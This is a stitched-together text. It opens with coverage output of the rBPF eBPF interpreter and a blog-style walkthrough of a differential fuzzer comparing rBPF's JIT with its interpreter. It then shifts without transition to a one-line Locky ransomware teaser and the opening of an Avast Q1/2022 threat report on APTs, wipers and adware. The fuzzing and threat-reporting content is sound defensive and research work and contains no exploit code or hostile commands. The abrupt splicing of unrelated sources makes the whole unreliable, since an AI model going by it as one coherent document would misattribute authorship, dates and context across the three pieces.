 916|    7|                ebpf::MOV32_REG  => reg[dst] = (reg[src] as u32) as u64,
 917|   15|                ebpf::ARSH32_IMM => { reg[dst] = (reg[dst] as i32).wrapping_shr(insn.imm as u32) as u64; reg[dst] &= u32::MAX as u64; },
 918|  236|                ebpf::ARSH32_REG => { reg[dst] = (reg[dst] as i32).wrapping_shr(reg[src] as u32) as u64; reg[dst] &= u32::MAX as u64; },
 919|    2|                ebpf::LE         => {
 920|    2|                    reg[dst] = match insn.imm {
 921|    1|                        16 => (reg[dst] as u16).to_le() as u64,
 922|    1|                        32 => (reg[dst] as u32).to_le() as u64,
 923|    0|                        64 => reg[dst].to_le(),
 924|     |                        _ => {
 925|    0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 926|     |                        }
 927|     |                    };
 928|     |                },
 929|    2|                ebpf::BE         => {
 930|    2|                    reg[dst] = match insn.imm {
 931|    1|                        16 => (reg[dst] as u16).to_be() as u64,
 932|    1|                        32 => (reg[dst] as u32).to_be() as u64,
 933|    0|                        64 => reg[dst].to_be(),
 934|     |                        _ => {
 935|    0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 936|     |                        }
 937|     |                    };
 938|     |                },
 939|     |
 940|     |                // BPF_ALU64 class
 941|16.7k|                ebpf::ADD64_IMM  => reg[dst] = reg[dst].wrapping_add(insn.imm as u64),
 942|   26|                ebpf::ADD64_REG  => reg[dst] = reg[dst].wrapping_add(reg[src]),
 943|  145|                ebpf::SUB64_IMM  => reg[dst] = reg[dst].wrapping_sub(insn.imm as u64),
 944|   25|                ebpf::SUB64_REG  => reg[dst] = reg[dst].wrapping_sub(reg[src]),
 945|  480|                ebpf::MUL64_IMM  => reg[dst] = reg[dst].wrapping_mul(insn.imm as u64),
 946|   13|                ebpf::MUL64_REG  => reg[dst] = reg[dst].wrapping_mul(reg[src]),
 947|  191|                ebpf::DIV64_IMM  => reg[dst] /= insn.imm as u64,
 948|     |                ebpf::DIV64_REG  => {
 949|    5|                    if reg[src] == 0 {
 950|    3|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 951|    2|                    }
 952|    2|                    reg[dst] /= reg[src];
 953|     |                },
 954|     |                ebpf::SDIV64_IMM => {
 955|    0|                    if reg[dst] as i64 == i64::MIN && insn.imm == -1 {
 956|    0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 957|    0|                    }
 958|    0|
 959|    0|                    reg[dst] = (reg[dst] as i64 / insn.imm) as u64
 960|     |                }
 961|     |                ebpf::SDIV64_REG => {
 962|    0|                    if reg[src] == 0 {
 963|    0|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 964|    0|                    }
 965|    0|                    if reg[dst] as i64 == i64::MIN && reg[src] as i64 == -1 {
 966|    0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 967|    0|                    }
 968|    0|                    reg[dst] = (reg[dst] as i64 / reg[src] as i64) as u64;
 969|     |                },
 970|  115|                ebpf::OR64_IMM   => reg[dst] |= insn.imm as u64,
 971|   19|                ebpf::OR64_REG   => reg[dst] |= reg[src],
 972|   93|                ebpf::AND64_IMM  => reg[dst] &= insn.imm as u64,
 973|   19|                ebpf::AND64_REG  => reg[dst] &= reg[src],
 974|   19|                ebpf::LSH64_IMM  => reg[dst] = reg[dst].wrapping_shl(insn.imm as u32),
 975|   48|                ebpf::LSH64_REG  => reg[dst] = reg[dst].wrapping_shl(reg[src] as u32),
 976|    4|                ebpf::RSH64_IMM  => reg[dst] = reg[dst].wrapping_shr(insn.imm as u32),
 977|    5|                ebpf::RSH64_REG  => reg[dst] = reg[dst].wrapping_shr(reg[src] as u32),
 978|   94|                ebpf::NEG64      => reg[dst] = (reg[dst] as i64).wrapping_neg() as u64,
 979|  141|                ebpf::MOD64_IMM  => reg[dst] %= insn.imm as u64,
 980|     |                ebpf::MOD64_REG  => {
 981|   19|                    if reg[src] == 0 {
 982|    4|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 983|   15|                    }
 984|   15|                    reg[dst] %= reg[src];
 985|     |                },
 986|   98|                ebpf::XOR64_IMM  => reg[dst] ^= insn.imm as u64,
 987|   17|                ebpf::XOR64_REG  => reg[dst] ^= reg[src],
 988|   89|                ebpf::MOV64_IMM  => reg[dst] = insn.imm as u64,
 989|   10|                ebpf::MOV64_REG  => reg[dst] = reg[src],
 990|   14|                ebpf::ARSH64_IMM => reg[dst] = (reg[dst] as i64).wrapping_shr(insn.imm as u32) as u64,
 991|  294|                ebpf::ARSH64_REG => reg[dst] = (reg[dst] as i64).wrapping_shr(reg[src] as u32) as u64,
 992|     |
 993|     |                // BPF_JMP class
 994| 327k|                ebpf::JA         => { next_pc = (next_pc as isize + insn.off as isize) as usize; },
 995|  116|                ebpf::JEQ_IMM    => if reg[dst] == insn.imm as u64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^76  ^40
 996| 131k|                ebpf::JEQ_REG    => if reg[dst] == reg[src] { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^131k  ^11
 997| 163k|                ebpf::JGT_IMM    => if reg[dst] > insn.imm as u64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^147k  ^16.4k
 998| 131k|                ebpf::JGT_REG    => if reg[dst] > reg[src] { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^131k  ^34
 999|65.5k|                ebpf::JGE_IMM    => if reg[dst] >= insn.imm as u64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^65.5k  ^8
1000|65.5k|                ebpf::JGE_REG    => if reg[dst] >= reg[src] { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^65.5k  ^11
1001|65.5k|                ebpf::JLT_IMM    => if reg[dst] < insn.imm as u64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^65.5k  ^3
1002|    6|                ebpf::JLT_REG    => if reg[dst] < reg[src] { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^4  ^2
1003| 131k|                ebpf::JLE_IMM    => if reg[dst] <= insn.imm as u64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^131k  ^2
1004|65.5k|                ebpf::JLE_REG    => if reg[dst] <= reg[src] { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^65.5k  ^2
1005|    3|                ebpf::JSET_IMM   => if reg[dst] & insn.imm as u64 != 0 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^1  ^2
1006|    2|                ebpf::JSET_REG   => if reg[dst] & reg[src] != 0 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^0
1007| 196k|                ebpf::JNE_IMM    => if reg[dst] != insn.imm as u64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^196k  ^3
1008| 131k|                ebpf::JNE_REG    => if reg[dst] != reg[src] { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^131k  ^3
1009|65.5k|                ebpf::JSGT_IMM   => if reg[dst] as i64 > insn.imm as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^65.5k  ^6
1010|   14|                ebpf::JSGT_REG   => if reg[dst] as i64 > reg[src] as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^1  ^13
1011|65.5k|                ebpf::JSGE_IMM   => if reg[dst] as i64 >= insn.imm as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^65.5k  ^12
1012|65.5k|                ebpf::JSGE_REG   => if reg[dst] as i64 >= reg[src] as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^65.5k  ^4
1013| 131k|                ebpf::JSLT_IMM   => if (reg[dst] as i64) < insn.imm as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^131k  ^20
1014| 147k|                ebpf::JSLT_REG   => if (reg[dst] as i64) < reg[src] as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^147k  ^23
1015|65.5k|                ebpf::JSLE_IMM   => if (reg[dst] as i64) <= insn.imm as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^65.5k  ^4
1016| 131k|                ebpf::JSLE_REG   => if (reg[dst] as i64) <= reg[src] as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^131k  ^2
1017|     |
1018|     |                ebpf::CALL_REG   => {
1019|    0|                    let target_address = reg[insn.imm as usize];
1020|    0|                    reg[ebpf::FRAME_PTR_REG] =
1021|    0|                        self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
1022|    0|                    if target_address < self.program_vm_addr {
1023|    0|                        return Err(EbpfError::CallOutsideTextSegment(pc + ebpf::ELF_INSN_DUMP_OFFSET, target_address / ebpf::INSN_SIZE as u64 * ebpf::INSN_SIZE as u64));
1024|    0|                    }
1025|    0|                    next_pc = self.check_pc(pc, (target_address - self.program_vm_addr) as usize / ebpf::INSN_SIZE)?;
1026|     |                },
1027|     |
1028|     |                // Do not delegate the check to the verifier, since registered functions can be
1029|     |                // changed after the program has been verified.
1030|     |                ebpf::CALL_IMM => {
1031|   17|                    let mut resolved = false;
1032|   17|                    let (syscalls, calls) = if config.static_syscalls {
1033|   17|                        (insn.src == 0, insn.src != 0)
1034|     |                    } else {
1035|    0|                        (true, true)
1036|     |                    };
1037|     |
1038|   17|                    if syscalls {
1039|    6|                        if let Some(syscall) = self.executable.get_syscall_registry().lookup_syscall(insn.imm as u32) {
                                       ^0
1040|    0|                            resolved = true;
1041|    0|
1042|    0|                            if config.enable_instruction_meter {
1043|    0|                                let _ = instruction_meter.consume(*last_insn_count);
1044|    0|                            }
1045|    0|                            *last_insn_count = 0;
1046|    0|                            let mut result: ProgramResult<E> = Ok(0);
1047|    0|                            (unsafe { std::mem::transmute::<u64, SyscallFunction::<E, *mut u8>>(syscall.function) })(
1048|    0|                                self.syscall_context_objects[SYSCALL_CONTEXT_OBJECTS_OFFSET + syscall.context_object_slot],
1049|    0|                                reg[1],
1050|    0|                                reg[2],
1051|    0|                                reg[3],
1052|    0|                                reg[4],
1053|    0|                                reg[5],
1054|    0|                                &self.memory_mapping,
1055|    0|                                &mut result,
1056|    0|                            );
1057|    0|                            reg[0] = result?;
1058|    0|                            if config.enable_instruction_meter {
1059|    0|                                remaining_insn_count = instruction_meter.get_remaining();
1060|    0|                            }
1061|    6|                        }
1062|   11|                    }
1063|     |
1064|   17|                    if calls {
1065|   11|                        if let Some(target_pc) = self.executable.lookup_bpf_function(insn.imm as u32) {
                                       ^0
1066|    0|                            resolved = true;
1067|     |
1068|     |                            // make BPF to BPF call
1069|    0|                            reg[ebpf::FRAME_PTR_REG] =
1070|    0|                                self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
1071|    0|                            next_pc = self.check_pc(pc, target_pc)?;
1072|   11|                        }
1073|    6|                    }
1074|     |
1075|   17|                    if !resolved {
1076|   17|                        if config.disable_unresolved_symbols_at_runtime {
1077|    6|                            return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
1078|     |                        } else {
1079|   11|                            self.executable.report_unresolved_symbol(pc)?;
1080|     |                        }
1081|    0|                    }
1082|     |                }
1083|     |
1084|     |                ebpf::EXIT => {
1085|   39|                    match self.stack.pop::<E>() {
1086|    0|                        Ok((saved_reg, frame_ptr, ptr)) => {
1087|    0|                            // Return from BPF to BPF call
1088|    0|                            reg[ebpf::FIRST_SCRATCH_REG
1089|    0|                                ..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS]
1090|    0|                                .copy_from_slice(&saved_reg);
1091|    0|                            reg[ebpf::FRAME_PTR_REG] = frame_ptr;
1092|    0|                            next_pc = self.check_pc(pc, ptr)?;
1093|     |                        }
1094|     |                        _ => {
1095|   39|                            return Ok(reg[0]);
1096|     |                        }
1097|     |                    }
1098|     |                }
1099|    0|                _ => return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET)),
1100|     |            }
1101|     |
1102|2.16M|            if config.enable_instruction_meter && *last_insn_count >= remaining_insn_count {
1103|     |                // Use `pc + instruction_width` instead of `next_pc` here because jumps and calls don't continue at the end of this instruction
1104|   33|                return Err(EbpfError::ExceededMaxInstructions(pc + instruction_width + ebpf::ELF_INSN_DUMP_OFFSET, initial_insn_count));
1105|2.16M|            }
1106|     |        }
1107|     |
1108|  683|        Err(EbpfError::ExecutionOverrun(
1109|  683|            next_pc + ebpf::ELF_INSN_DUMP_OFFSET,
1110|  683|        ))
1111|  886|    }
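To work with a listing like the one above programmatically, each row can be split into the three columns described earlier. The following is a minimal sketch, assuming rows of the form `line|count|source` and counts abbreviated with a `k` or `M` suffix as they appear in this listing; `CovLine`, `parse_count`, and `parse_cov_line` are hypothetical names, not part of any LLVM tooling.

```rust
/// One row of the coverage listing: `line|count|source`.
#[derive(Debug, PartialEq)]
struct CovLine {
    line: u32,
    /// `None` when the count column is empty (no executable code on the line).
    hits: Option<f64>,
    code: String,
}

/// Parse a hit count such as "886", "16.7k", or "2.16M".
/// Abbreviated counts are rounded in the listing, so the result is approximate.
fn parse_count(s: &str) -> Option<f64> {
    let s = s.trim();
    if s.is_empty() {
        return None;
    }
    let (digits, scale) = match s.chars().last()? {
        'k' => (&s[..s.len() - 1], 1e3),
        'M' => (&s[..s.len() - 1], 1e6),
        _ => (s, 1.0),
    };
    digits.parse::<f64>().ok().map(|n| n * scale)
}

/// Split a row into at most three columns so that `|` inside the source
/// column (for example `reg[dst] |= reg[src]`) is left untouched.
fn parse_cov_line(row: &str) -> Option<CovLine> {
    let mut cols = row.splitn(3, '|');
    let line = cols.next()?.trim().parse().ok()?;
    let hits = parse_count(cols.next()?);
    let code = cols.next()?.to_string();
    Some(CovLine { line, hits, code })
}

fn main() {
    let rows = [
        " 723|2.16M|        while (next_pc + 1) * ebpf::INSN_SIZE <= self.program.len() {",
        " 733|    0|                let mut state = [0u64; 12];",
        " 738|     |",
    ];
    for row in rows {
        println!("{:?}", parse_cov_line(row));
    }
}
```

Rows whose count is `Some(0.0)` are the uncovered lines, which makes it easy to list the instruction handlers the fuzzer never reached.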
Now we see that jump and call instructions are actually used, and that we
execute the content of the interpreter loop significantly more often despite
having approximately the same number of successful calls to the interpreter
function. From this, we can infer that not only are more programs successfully
executed, but also that those programs tend to execute more valid instructions
overall.
While this isn’t hitting every branch, it’s now hitting significantly more –
and with much more interesting values.
The development of this version of the fuzzer took about an hour, so we’re at
a total of one hour of development.
JIT and differential fuzzing
Now that we have a fuzzer which can generate lots of inputs that are actually
interesting to us, we can develop a fuzzer which can test both JIT and the
interpreter against each other. But how do we even test them against each
other?
Picking inputs, outputs, and configuration
As the definition of pseudo-oracle says: we need to check if the alternate
program (for JIT, the interpreter, and vice versa), when provided with the
same “input”, provides the same “output”. So what inputs and outputs do we
have?
For inputs, there are three notable things we’ll want to vary:
The config which determines how the VM should execute (what features and
such)
The BPF program to be executed, which we’ll generate like we do in “smart”
The initial memory of the VMs
Once we’ve developed our inputs, we’ll also need to think of our outputs:
The “return state”, the exit code itself or the error state
The number of instructions executed (e.g., did the JIT program overrun?)
The final memory of the VMs
Then, to execute both JIT and the interpreter, we’ll take the following steps:
The same steps as the first fuzzers:
Use the rBPF verification pass (called “check”) to make sure that the VM
will accept the input program
Initialise the memory, the syscalls, and the entrypoint
Create the executable data
Then prepare to perform the differential testing
JIT compile the BPF code (if it fails, fail quietly)
Initialise the interpreted VM
Initialise the JIT VM
Execute both the interpreted and JIT VMs
Compare return state, instructions executed, and final memory, and
panic if any do not match.
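The comparison described in the steps above can be sketched independently of rBPF. The following is a minimal illustration only: it uses a hypothetical three-instruction toy machine instead of BPF, `run_reference` stands in for the interpreter and `run_alternate` for the JIT, and the alternate deliberately ignores out-of-bounds stores so that the harness has a mismatch to find. None of these names come from the rBPF crate.

```rust
/// Toy instruction set standing in for BPF (hypothetical, not the rBPF ISA).
#[derive(Clone, Copy, Debug)]
enum Insn {
    Add(u64),     // acc += imm (wrapping)
    Store(usize), // mem[addr] = low byte of acc
    Exit,         // stop and return acc
}

/// Everything that is compared between the two implementations.
#[derive(Debug, PartialEq)]
struct Outcome {
    result: Result<u64, String>, // exit value or error state
    insns: u64,                  // number of instructions executed
    memory: Vec<u8>,             // final memory
}

/// Reference implementation (plays the role of the interpreter).
fn run_reference(prog: &[Insn], mut memory: Vec<u8>) -> Outcome {
    let (mut acc, mut insns) = (0u64, 0u64);
    for insn in prog {
        insns += 1;
        match *insn {
            Insn::Add(imm) => acc = acc.wrapping_add(imm),
            Insn::Store(addr) => {
                if addr >= memory.len() {
                    let result = Err(format!("bad store at {}", addr));
                    return Outcome { result, insns, memory };
                }
                memory[addr] = acc as u8;
            }
            Insn::Exit => return Outcome { result: Ok(acc), insns, memory },
        }
    }
    Outcome { result: Err("execution overrun".into()), insns, memory }
}

/// Alternate implementation (plays the role of the JIT). It deliberately
/// ignores out-of-bounds stores instead of reporting an error.
fn run_alternate(prog: &[Insn], mut memory: Vec<u8>) -> Outcome {
    let (mut acc, mut insns) = (0u64, 0u64);
    for insn in prog {
        insns += 1;
        match *insn {
            Insn::Add(imm) => acc = acc.wrapping_add(imm),
            Insn::Store(addr) => {
                if let Some(byte) = memory.get_mut(addr) {
                    *byte = acc as u8;
                }
            }
            Insn::Exit => return Outcome { result: Ok(acc), insns, memory },
        }
    }
    Outcome { result: Err("execution overrun".into()), insns, memory }
}

/// Run both implementations on identical inputs and report the first mismatch.
/// A fuzz target would panic here; returning `Err` keeps the sketch testable.
fn differential(prog: &[Insn], memory: &[u8]) -> Result<(), String> {
    let expected = run_reference(prog, memory.to_vec());
    let actual = run_alternate(prog, memory.to_vec());
    if expected.result != actual.result {
        return Err(format!("result: expected {:?}, got {:?}", expected.result, actual.result));
    }
    if expected.insns != actual.insns {
        return Err(format!("insns: expected {}, got {}", expected.insns, actual.insns));
    }
    if expected.memory != actual.memory {
        return Err(format!("memory: expected {:?}, got {:?}", expected.memory, actual.memory));
    }
    Ok(())
}

fn main() {
    let in_bounds = [Insn::Add(7), Insn::Store(0), Insn::Exit];
    let out_of_bounds = [Insn::Add(7), Insn::Store(99), Insn::Exit];
    println!("{:?}", differential(&in_bounds, &[0u8; 4]));
    println!("{:?}", differential(&out_of_bounds, &[0u8; 4]));
}
```

Each implementation gets its own copy of the initial memory, so a write by one cannot mask a missing write by the other.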
Writing the fuzzer
As before, I’ve split this up into more manageable chunks so you can read them
one at a time outside of their context before trying to interpret their final
context.
fuzz_target!(|data: FuzzData| {
    let mut prog = make_program(&data.prog, Arch::X64);
    ...snip...
    let config = data.template.into();
    if check(prog.into_bytes(), &config).is_err() {
        // verify please
        return;
    }
    let mut interp_mem = data.mem.clone();
    let mut jit_mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        prog.into_bytes(),
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    if Executable::jit_compile(&mut executable).is_ok() {
        let interp_mem_region = MemoryRegion::new_writable(&mut interp_mem, ebpf::MM_INPUT_START);
        // pass the memory region (not the raw buffer) to the interpreted VM
        let mut interp_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![interp_mem_region])
                .unwrap();
        let jit_mem_region = MemoryRegion::new_writable(&mut jit_mem, ebpf::MM_INPUT_START);
        let mut jit_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![jit_mem_region])
                .unwrap();

        // See step 3
    }
});
Step 3: Executing our input and comparing output
fuzz_target!(|data: FuzzData| {
    // see step 2

    if Executable::jit_compile(&mut executable).is_ok() {
        // see step 2

        let mut interp_meter = TestInstructionMeter { remaining: 1 << 16 };
        let interp_res = interp_vm.execute_program_interpreted(&mut interp_meter);
        let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };
        let jit_res = jit_vm.execute_program_jit(&mut jit_meter);
        if interp_res != jit_res {
            panic!("Expected {:?}, but got {:?}", interp_res, jit_res);
        }
        if interp_res.is_ok() {
            // we know jit res must be ok if interp res is by this point
            if interp_meter.remaining != jit_meter.remaining {
                panic!(
                    "Expected {} insts remaining, but got {}",
                    interp_meter.remaining, jit_meter.remaining
                );
            }
            if interp_mem != jit_mem {
                panic!(
                    "Expected different memory. From interpreter: {:?}\nFrom JIT: {:?}",
                    interp_mem, jit_mem
                );
            }
        }
    }
});
Step 4: Put it together
Below is the final code for the fuzzer, including all of the bits I didn’t
show above for concision.
#![no_main]

use std::collections::BTreeMap;

use libfuzzer_sys::fuzz_target;

use grammar_aware::*;
use solana_rbpf::{
    ebpf, // needed for ebpf::MM_INPUT_START below
    elf::{register_bpf_function, Executable},
    insn_builder::{Arch, Instruction, IntoBytes},
    memory_region::MemoryRegion,
    user_error::UserError,
    verifier::check,
    vm::{EbpfVm, SyscallRegistry, TestInstructionMeter},
};

use crate::common::ConfigTemplate;

mod common;
mod grammar_aware;

#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    exit_dst: u8,
    exit_src: u8,
    exit_off: i16,
    exit_imm: i64,
    prog: FuzzProgram,
    mem: Vec<u8>,
}

fuzz_target!(|data: FuzzData| {
    let mut prog = make_program(&data.prog, Arch::X64);
    prog.exit()
        .set_dst(data.exit_dst)
        .set_src(data.exit_src)
        .set_off(data.exit_off)
        .set_imm(data.exit_imm)
        .push();
    let config = data.template.into();
    if check(prog.into_bytes(), &config).is_err() {
        // verify please
        return;
    }
    let mut interp_mem = data.mem.clone();
    let mut jit_mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        prog.into_bytes(),
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    if Executable::jit_compile(&mut executable).is_ok() {
        let interp_mem_region = MemoryRegion::new_writable(&mut interp_mem, ebpf::MM_INPUT_START);
        // pass the memory region (not the raw buffer) to the interpreted VM
        let mut interp_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![interp_mem_region])
                .unwrap();
        let jit_mem_region = MemoryRegion::new_writable(&mut jit_mem, ebpf::MM_INPUT_START);
        let mut jit_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![jit_mem_region])
                .unwrap();

        let mut interp_meter = TestInstructionMeter { remaining: 1 << 16 };
        let interp_res = interp_vm.execute_program_interpreted(&mut interp_meter);
        let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };
        let jit_res = jit_vm.execute_program_jit(&mut jit_meter);
        if interp_res != jit_res {
            panic!("Expected {:?}, but got {:?}", interp_res, jit_res);
        }
        if interp_res.is_ok() {
            // we know jit res must be ok if interp res is by this point
            if interp_meter.remaining != jit_meter.remaining {
                panic!(
                    "Expected {} insts remaining, but got {}",
                    interp_meter.remaining, jit_meter.remaining
                );
            }
            if interp_mem != jit_mem {
                panic!(
                    "Expected different memory. From interpreter: {:?}\nFrom JIT: {:?}",
                    interp_mem, jit_mem
                );
            }
        }
    }
});
Theoretically, an up-to-date version is available in the
rBPF repo.
And, with that, we have our fuzzer! This part of the fuzzer took approximately
three hours to implement (largely due to finding several issues with the
fuzzer and debugging them along the way).
At this point, we were about six hours in. I turned on the fuzzer and waited:
$ cargo +nightly fuzz run smart-jit-diff --jobs 4 -- -ignore_crashes=1
And the crashes began. Two main bugs appeared:
A panic when there was an error in the interpreter, but not in JIT, when
writing to a particular address (crash in 15 minutes)
An AddressSanitizer crash from a memory leak when an error occurred just
after the instruction limit was passed by the JIT’d program (crash in two
hours)
To read the details of these bugs, continue to Part 2.
by splinter_code - 26 June 2016 Locky ransomware has resumed its illegal activity of stealing money from its victims after a period of inactivity since the end of May. This time, it comes with hard-coded javascript...
The first quarter of 2022 is over, so we are here again to share insights into the threat landscape and what we’ve seen in the wild. Under normal circumstances, I would probably highlight mobile spyware related to the Beijing 2022 Winter Olympics, yet another critical Java vulnerability (Spring4Shell), or perhaps how long it took malware authors to get back from their Winter holidays to their regular operations. Unfortunately, however, all of this was overshadowed by Russia’s war in Ukraine.
Similar to what’s happening in Ukraine, the warfare co-occurring in cyberspace is also very intensive, with a wide-ranging offensive arsenal in use. To name a few examples, we witnessed multiple Russia-attributed APT groups attacking Ukraine (a series of wiping malware and ransomware, a massive uptick of Gamaredon APT toolkit activity, and disruption of satellite internet connections). In addition, hacktivism, DDoS attacks on government sites, and data leaks are ongoing daily on all sides of the conflict. Furthermore, some malware authors and operators were directly affected by the war; for instance, the alleged death of the leading Raccoon Stealer developer resulted in the (at least temporary) discontinuation of this particular threat. Additionally, some malware gangs have chosen sides in this conflict and have started threatening others. One such example is the Conti gang, which promised ransomware retaliation for cyberattacks against Russia. You can find more details about this story in this report.
With all that said, it is hardly surprising that we’ve seen a significant increase in attacks of particular malware types in countries involved in this conflict in Q1/2022; for example, we blocked 50% more RAT attacks in Ukraine, Russia, and Belarus, 30% more botnet attacks, and 20% more info-stealer attacks. To help the victims of these attacks, we developed and released multiple free ransomware decryption tools, including one for the HermeticRansom that we discovered in Ukraine just a few hours before the invasion started.
Out of the other malware-related Q1/2022 news: the groups behind Emotet and Trickbot appeared to be working closely together, resurrecting Trickbot infected computers by moving them under Emotet control and deprecating Trickbot afterward. Furthermore, this report describes massive info-stealing campaigns in Latin America, large adware campaigns in Japan, and technical support scams spreading in the US and Canada. Finally, again, the Lapsus$ hacking group emerged with breaches in big tech companies, including Microsoft, Nvidia, and Samsung, but hopefully also disappeared after multiple arrests of its members in March.
Last but not least, we’ve published our discovery of the latest Parrot Traffic Direction System (TDS) campaign that has emerged in recent months and is reaching users from around the world. This TDS has infected various web servers hosting more than 16,500 websites.
Stay safe and enjoy reading this report.
Jakub Křoustek, Malware Research Director
Methodology
This report is structured into two main sections – Desktop-related threats, informing about our intelligence on attacks targeting Windows, Linux, and macOS, and Mobile-related threats, where we advise about Android and iOS attacks.
Furthermore, we use the term risk ratio in this report to describe the severity of particular threats, calculated as a monthly average of “Number of attacked users / Number of active users in a given country.” Unless stated otherwise, calculated risks are only available for countries with more than 10,000 active users per month.
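As a rough illustration of this definition, the sketch below computes a risk ratio from per-month counts. It assumes that “monthly average” means the mean of the monthly ratios and that a country is reported only when every month has more than 10,000 active users; the function names and the input figures are made up for the example and are not Avast data.

```rust
/// Risk for a single month: attacked users divided by active users.
/// Returns `None` when the month does not exceed the reporting threshold.
fn monthly_risk(attacked: u64, active: u64) -> Option<f64> {
    const MIN_ACTIVE_USERS: u64 = 10_000; // threshold quoted in the text
    if active <= MIN_ACTIVE_USERS {
        return None;
    }
    Some(attacked as f64 / active as f64)
}

/// Risk ratio for a period: the mean of the monthly ratios (an assumption
/// about how the average is taken). Each tuple is `(attacked, active)`.
fn risk_ratio(months: &[(u64, u64)]) -> Option<f64> {
    if months.is_empty() {
        return None;
    }
    let mut sum = 0.0;
    for &(attacked, active) in months {
        sum += monthly_risk(attacked, active)?;
    }
    Some(sum / months.len() as f64)
}

fn main() {
    // Illustrative numbers only: three months of a quarter.
    let quarter = [(500, 50_000), (1_000, 50_000), (1_500, 50_000)];
    match risk_ratio(&quarter) {
        Some(r) => println!("risk ratio: {:.2}%", r * 100.0),
        None => println!("not enough active users to report"),
    }
}
```

With these inputs the monthly ratios are 1%, 2%, and 3%, so the quarterly risk ratio is their mean.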
Desktop-Related Threats
Advanced Persistent Threats (APTs)
In March, we wrote about an APT campaign targeting betting companies in Taiwan, the Philippines, and Hong Kong that we called Operation Dragon Castling. The attacker, a Chinese-speaking group, leveraged two different ways to gain a foothold in the targeted devices – an infected installer sent in a phishing email and a newly identified vulnerability in the WPS Office updater (CVE-2022-24934). After successful infection, the malware used a diverse set of plugins to achieve privilege escalation, persistence, keylogging, and backdoor access.
Furthermore, on February 23rd, a day before Russia started its invasion of Ukraine, ESET tweeted that they discovered a new data wiper called HermeticWiper. The attacker’s motivation was to destroy and maximize damage to the infected system. It’s not just disrupting the MBR but also destroying a filesystem and individual files. Shortly after that, we at Avast discovered a related piece of ransomware that we called HermeticRansom. You can find more on this topic in the Ransomware section below. These attacks are believed to have been carried out by Russian APT groups.
Continuing this subject, Gamaredon is known as the most active Russia-backed APT group targeting Ukraine. We see the standard high level of activity of this APT group in Ukraine which accelerated rapidly since the beginning of the Russian invasion at the end of February when the number of their attacks grew several times over.
We also noticed an increase in Korplug activity which expanded its focus from the more usual south Asian countries such as Myanmar, Vietnam, or Thailand to Papua New Guinea and Africa. The most affected African countries are Ghana, Uganda and Nigeria. As Korplug is commonly attributed to Chinese APT groups, this new expansion aligns with their long-term interest in countries involved in China’s Belt and Road initiative.
Luigino Camastra, Malware Researcher Igor Morgenstern, Malware Researcher Jan Holman, Malware Researcher
Adware
Desktop adware became more aggressive in Q4/21, and a similar trend persists in Q1/22, as the graph below illustrates:
On the other hand, there are some interesting phenomena in Q1/22. Firstly, Japan’s proportion of adware activity has increased significantly in February and March; see the graph below. There is also an interesting correlation with Emotet hitting Japanese inboxes in the same period.
